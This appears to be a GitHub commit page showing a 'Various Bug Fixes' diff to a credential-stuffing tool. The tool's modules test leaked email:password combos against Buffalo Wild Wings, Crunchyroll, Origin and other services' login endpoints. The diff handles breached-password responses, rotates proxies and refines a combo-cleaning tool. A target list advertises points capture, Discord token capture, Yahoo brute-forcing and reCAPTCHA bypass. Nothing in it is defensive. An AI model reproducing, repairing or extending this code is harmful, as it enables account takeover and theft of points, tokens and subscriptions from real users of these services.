Skip to content
This repository has been archived by the owner on Feb 23, 2024. It is now read-only.

Commit

Permalink
Various Bug Fixes
Browse files Browse the repository at this point in the history
  • Loading branch information
Mickey758 committed Dec 3, 2022
1 parent 272bb1a commit 5d05bc6
Show file tree
Hide file tree
Showing 9 changed files with 28 additions and 23 deletions.
7 changes: 6 additions & 1 deletion modules/checkers/bww.py
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,12 @@ def check(email:str,password:str):
if "invalid_user_password" in r.text:
Checker.bad += 1
return
if "wresult" not in r.text:
elif "This login attempt has been blocked because the password you're using was previously disclosed through a data breach" in r.text:
if not Checker.cui: log("custom",':'.join([email,password]),"BWW")
save("Buffalo Wild Wings","custom",Checker.time,':'.join([email,password]))
Checker.custom += 1
return
elif "wresult" not in r.text:
raise
sid = r.text.split('sid":"')[1].split('","realm')[0]
wc = quote(json.dumps({"strategy":"auth0","auth0Client":"eyJuYW1lIjoiYXV0aDAuanMtdWxwIiwidmVyc2lvbiI6IjkuMTYuNCJ9","tenant":"bww-prd01","connection":"firebase-auth","client_id":"mLLAi6nx8PX5OykSkTBG79aw5SkfIdKG","response_type":"code","scope":"openid offline_access","redirect_uri":"https://www.buffalowildwings.com/callback","state":state,"sid":sid,"realm":"firebase-auth"}))
Expand Down
4 changes: 2 additions & 2 deletions modules/checkers/crunchyroll.py
Original file line number Diff line number Diff line change
Expand Up @@ -28,9 +28,9 @@ def check(email:str,password:str):
r = s.post("https://api.crunchyroll.com/start_session.0.json",headers=header,data=payload)
session_id = r.json()['data']['session_id']

payload = f"account={email}&password={password}&session_id={session_id}&locale=enUS&version=1.3.1.0&connectivity_type=ethernet"
payload = {'account':email,'password':password,'session_id':session_id,'locale':'enUS','version':'1.3.1.0','connectivity_type':'ethernet'}
r = s.post("https://api.crunchyroll.com/login.0.json",headers=header,data=payload)
if 'Incorrect login information.' in r.text:
if any(key in r.text for key in ['You forgot to put in your password.','Incorrect login information.']):
Checker.bad += 1
return_proxy(proxy)
return
Expand Down
3 changes: 1 addition & 2 deletions modules/checkers/origin.py
Original file line number Diff line number Diff line change
Expand Up @@ -119,8 +119,7 @@ def check(email:str,password:str):
return


except Exception as e:
print(e)
except:
bad_proxy(proxy)
return_proxy(proxy)
Checker.errors += 1
Expand Down
3 changes: 2 additions & 1 deletion modules/start.py
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@
"dominos [points capture | recaptcha v3 bypass]":dominos,
"dickeys [points capture]":dickeys,
"honeygain [credits capture]":honeygain,
'yahoo [brute]':yahoo,
"yahoo [brute]":yahoo,
"discord [token capture | solver]":discord,
"instagram [followers capture]":instagram,
"disney+ [full capture]":disney,
Expand Down Expand Up @@ -68,6 +68,7 @@ def initializeChecker(account:str):
Checker.remaining.remove(account)
return

Checker.remaining.remove(account)
Checker.cpm += 60
Checker.bad += 1

Expand Down
2 changes: 1 addition & 1 deletion modules/tools/capture_remove.py
Original file line number Diff line number Diff line change
Expand Up @@ -49,6 +49,6 @@ def edit(combos):
if " " in password: password = password.split(" ")[0]
new_combo = ':'.join([email,password])

if new_combo not in to_save: to_save.append(combo)
if new_combo not in to_save: to_save.append(new_combo)

save("Capture_Remove",None,Checker.time,"\n".join(to_save))
2 changes: 1 addition & 1 deletion modules/tools/proxy_check.py
Original file line number Diff line number Diff line change
Expand Up @@ -70,12 +70,12 @@ def check(proxy:str):

s.get("http://httpbin.org/get")
Checker.good += 1
Checker.cpm += 60

if not Checker.cui: log("good",proxy,Checker.proxy_type.title())
save(Checker.proxy_type.title(),"good",Checker.time,proxy)
except:
Checker.bad += 1
finally:
Checker.cpm += 60
Checker.remaining.remove(proxy)
return
2 changes: 1 addition & 1 deletion modules/variables.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
from threading import Lock
lock = Lock()
version = "1.0.2.2"
version = "1.0.2.3"
discord_name = "MickeyYe#9423"
class Checker:
bad = 0
Expand Down
26 changes: 13 additions & 13 deletions requirements.txt
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
anticaptchaofficial==1.0.43
beautifulsoup4==4.11.1
colored==1.4.3
console==0.9907
numerize==0.12
PyAutoGUI==0.9.53
pywin32==304
random_user_agent==1.0.1
requests==2.27.1
rsa==4.9
setuptools==63.2.0
six==1.16.0
TwoCaptcha==0.0.1
anticaptchaofficial
beautifulsoup4
colored
console
numerize
PyAutoGUI
pywin32
random_user_agent
requests
rsa
setuptools
six
TwoCaptcha
2 changes: 1 addition & 1 deletion version
Original file line number Diff line number Diff line change
@@ -1 +1 @@
1.0.2.2
1.0.2.3

0 comments on commit 5d05bc6

Please sign in to comment.